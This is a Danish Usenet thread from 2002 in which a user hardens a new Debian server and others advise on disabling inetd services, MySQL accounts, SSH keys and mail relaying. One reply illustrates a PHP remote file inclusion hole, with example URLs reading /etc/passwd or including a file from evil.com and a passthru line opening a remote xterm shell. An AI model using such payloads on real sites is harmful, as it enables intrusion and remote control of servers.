---

:)

Mit efterhånden 2 dage gamle Debian system er stadig ved at blive
gjort mere sikkert.

Jeg har fire krav til min server:

Det skal være en:
- Webserver (Apache med PHP)
- FTP Server (Proftpd)
- MySQL Server
- SSH Server
- SMTP (til eksperimenter med programmering af en mailklient)

Jeg portscannede localhost og fandt:

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com,
www.insecure.org/nmap/) Interesting ports on warrior2 (127.0.0.1):
Port State Protocol Service
9 open tcp discard
13 open tcp daytime
21 open tcp ftp
22 open tcp ssh
25 open tcp smtp
37 open tcp time
79 open tcp finger
80 open tcp http
111 open tcp sunrpc
113 open tcp auth
515 open tcp printer
3306 open tcp mysql

So far so good. Jeg skal bruge:
- http
- ftp
- smtp
- ssh
- mysql

Kan jeg bare uninstalle de andre services?

Printer er nok en printerserver, det benytter jeg ikke, eftersom jeg
ikke har en printer.

Time aner jeg ikke hvad er. Daytimer ligeledes. Discard ved
heller ikke.

Finger kan give min oplysninger om brugerne, men er det
noget man kan fjerne, hvis man ikke bruger det?

SunRPC, er det ikke sådan en slags remote file system eller noget?
Jeg har ikke tænkt mig at benytte den slags, når jeg bruger FTP.

Auth? Lyder som noget med authentication, men hvad bruges det til?

/Søren

--
Fjern "nospam" fra e-mailadressen, hvis du vil skrive til mig!
Så er man godt nok en spade --> http://www.sjl.dk/
Er du på ICQ? Prøv mit nummer: 83 60 347

---

Søren Jacob Lauritsen wrote:

> So far so good. Jeg skal bruge:
> - http
> - ftp
> - smtp
> - ssh
> - mysql
>
> Kan jeg bare uninstalle de andre services?

Det er jo ikke så galt. Udkommenter
discard, daytime, time, finger, auth, printer i din /etc/inetd.conf
og genstart inetd. Find ud af hvad der starter sunrpc, stop det
(på min solarisbox: /etc/init.d/rpc) og gør så det ikke starter igen.

Kør så nmap igen og se om det hjalp.

-- Ole

---

Ole Michaelsen wrote:

> Det er jo ikke så galt. Udkommenter
> discard, daytime, time, finger, auth, printer i din
> /etc/inetd.conf og genstart inetd. Find ud af hvad der starter
> sunrpc, stop det (på min solarisbox: /etc/init.d/rpc) og gør så
> det ikke starter igen.

Det hjalp på det! :) Desværre stod Printer og auth ikke i min
/etc/inetd.conf. Jeg prøvede at køre en 'locate auth', jeg ved ikke
om det er den rigtige auth, men det ligner at det enten har noget
med SunRPC eller Apache at gøre.

SunRPC har jeg stadig ikke fundet.

/Søren

--
Fjern "nospam" fra e-mailadressen, hvis du vil skrive til mig!
Så er man godt nok en spade --> http://www.sjl.dk/
Er du på ICQ? Prøv mit nummer: 83 60 347

---

Søren Jacob Lauritsen wrote:

> :)
>
> Mit efterhånden 2 dage gamle Debian system er stadig ved at blive
> gjort mere sikkert.
>
> Jeg har fire krav til min server:
>
> Det skal være en:
> - Webserver (Apache med PHP)
> - FTP Server (Proftpd)
> - MySQL Server
> - SSH Server
> - SMTP (til eksperimenter med programmering af en mailklient)
>
> Jeg portscannede localhost og fandt:
>
> Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com,
> www.insecure.org/nmap/) Interesting ports on warrior2 (127.0.0.1):
> Port State Protocol Service
> 9 open tcp discard
> 13 open tcp daytime
> 21 open tcp ftp
> 22 open tcp ssh
> 25 open tcp smtp
> 37 open tcp time
> 79 open tcp finger
> 80 open tcp http
> 111 open tcp sunrpc
> 113 open tcp auth
> 515 open tcp printer
> 3306 open tcp mysql
>
> So far so good. Jeg skal bruge:
> - http
> - ftp
> - smtp
> - ssh
> - mysql
>
> Kan jeg bare uninstalle de andre services?
>
> Printer er nok en printerserver, det benytter jeg ikke, eftersom jeg
> ikke har en printer.

lpd - kan slås fra i /etc/rc2.d/

> Time aner jeg ikke hvad er. Daytimer ligeledes. Discard ved
> heller ikke.

Hvis du ikke kender til dem skal du formentlig ikke bruge dem. Du fjerner
dem ved at udkommentere dem i /etc/inetd.conf

> Finger kan give min oplysninger om brugerne, men er det
> noget man kan fjerne, hvis man ikke bruger det?

Som ovenfor.

> SunRPC, er det ikke sådan en slags remote file system eller noget?

portmap. Bruges bl. a. til NFS. Den kan du slå fra i /etc/rc2.d/

> Auth? Lyder som noget med authentication, men hvad bruges det til?

Også kaldet identd. Den kan du også slå fra i /etc/inetd.conf.

Rasmus

--
-- [ Rasmus "Møffe" Bøg Hansen ] ---------------------------------------
[ Cancel Cancelled ]
- Pine
----------------------------------[ moffe at amagerkollegiet dot dk ] --

---

Søren Jacob Lauritsen <devnull@nospam.sjl.dk> wrote:
> Jeg har fire krav til min server:
>
> Det skal være en:
> - Webserver (Apache med PHP)

Mange hjemmebryggede PHP scripts har utallige sikkerhedsfejl som kan
give en angriber kontrol over din maskine. Hvis du har brug for at
skrive PHP kode, saa bed en ven med godt kendskab til PHP om at laese
koden igennem inden du laegger det online.

> - MySQL Server

Soerg for at den ikke koerer som root, og overvej at bruge UNIX sockets
fremfor BSD sockets til kommunikation med MySQL.

> - SSH Server

Overvej at benytte noegle validering af dine brugere. Jeg har skrevet en
lille artikel om SSH som du maaske kan bruge:

   http://a.area51.dk/ssh

> - SMTP (til eksperimenter med programmering af en mailklient)

Soerg for at du ikke kommer til at aabne for relaying til hele verdenen.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.area51.dk/

---

Alex Holst wrote:

> Mange hjemmebryggede PHP scripts har utallige sikkerhedsfejl som
> kan give en angriber kontrol over din maskine.

Har du et link til et sted, der beskriver den slags fejl?

> ang. MySQL:
> Soerg for at den ikke koerer som root, og overvej at bruge UNIX
> sockets fremfor BSD sockets til kommunikation med MySQL.

Hvor bestemmer jeg, hvad den skal køre som? Kunne man med fordel
oprette en user "mysql"? Eller er der en user "nobody", man benytter
til den slags?

> Overvej at benytte noegle validering af dine brugere. Jeg har
> skrevet en lille artikel om SSH som du maaske kan bruge:
>
> http://a.area51.dk/ssh

Takker! :)

>> - SMTP (til eksperimenter med programmering af en mailklient)
>
> Soerg for at du ikke kommer til at aabne for relaying til hele
> verdenen.

Det skulle være ordnet. Det er Exim jeg benytter, så jeg har sat
"host_accept_relay" til at være nogle enkelte PC'er på mit lokalnet.
Desuden er port 25 lukket for indadgående trafik i routeren.

/Søren

--
Fjern "nospam" fra e-mailadressen, hvis du vil skrive til mig!
Så er man godt nok en spade --> http://www.sjl.dk/
Er du på ICQ? Prøv mit nummer: 83 60 347

---

Søren Jacob Lauritsen <devnull@nospam.sjl.dk> wrote:
>> Mange hjemmebryggede PHP scripts har utallige sikkerhedsfejl som
>> kan give en angriber kontrol over din maskine.
>
> Har du et link til et sted, der beskriver den slags fejl?

David Wheeler's Secure Programming er en rigtigt god bog. Brug tid paa
at laese det hele igennem, hvis du kan. Kort fortalt skal du i dit web
program sikre dig, at brugerinput ikke indeholder noget ondt inden det
bliver foert videre til systemet.

http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/book1.html

Det er saa smart at have en menu.php som tager et GET argument og smider
det direkte ind i en include() statement. Det betyder at en angriber kan
bede om

   http://www.example.com/menu.php?show=/etc/passwd

eller endnu vaerre, angive en URL til en fil som er under hans kontrol:

   http://www.example.com/menu.php?show=http://www.evil.com/foo.php

Angriberens foo.php kan f.eks. indeholde:

   passthru("xterm -display wibble.foo.com:0");

og vupti, saa har han en kommandolinie der hurtigt kan forhoejes til root.

>> ang. MySQL:
>> Soerg for at den ikke koerer som root, og overvej at bruge UNIX
>> sockets fremfor BSD sockets til kommunikation med MySQL.
>
> Hvor bestemmer jeg, hvad den skal køre som? Kunne man med fordel
> oprette en user "mysql"? Eller er der en user "nobody", man benytter
> til den slags?

Du kan med fordel anvende en mysql bruger. Hvis du benytter "nobody" kan
du vaere uheldig at give angribere som kan paavirke filer gennem din
webserver direkte adgang til dine database filer. Det har du ikke lyst
til. Selve opsaetningen sker i konfigurationsfilen. Jeg mener den hedder
/etc/my.cnf men er ikke sikker.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.area51.dk/

---

On Fri, 15 Feb 2002 06:32:55 GMT, Søren Jacob Lauritsen wrote:

>> ang. MySQL: Soerg for at den ikke koerer som root, og overvej at
>> bruge UNIX sockets fremfor BSD sockets til kommunikation med MySQL.

> Hvor bestemmer jeg, hvad den skal køre som? Kunne man med fordel
> oprette en user "mysql"?

Debian har lavet en mysql-bruger som din mysql allerede køres som.


,

--
"I happen to be a Swede myself" Adam Sjøgren
asjo@koldfront.dk

---

Adam Sjøgren wrote:

> Debian har lavet en mysql-bruger som din mysql allerede køres som.

Det opdagede jeg, da jeg kiggede /etc/mysql/my.cnf igennem i går! :)

/Søren

--
Fjern "nospam" fra e-mailadressen, hvis du vil skrive til mig!
Så er man godt nok en spade --> http://www.sjl.dk/
Er du på ICQ? Prøv mit nummer: 83 60 347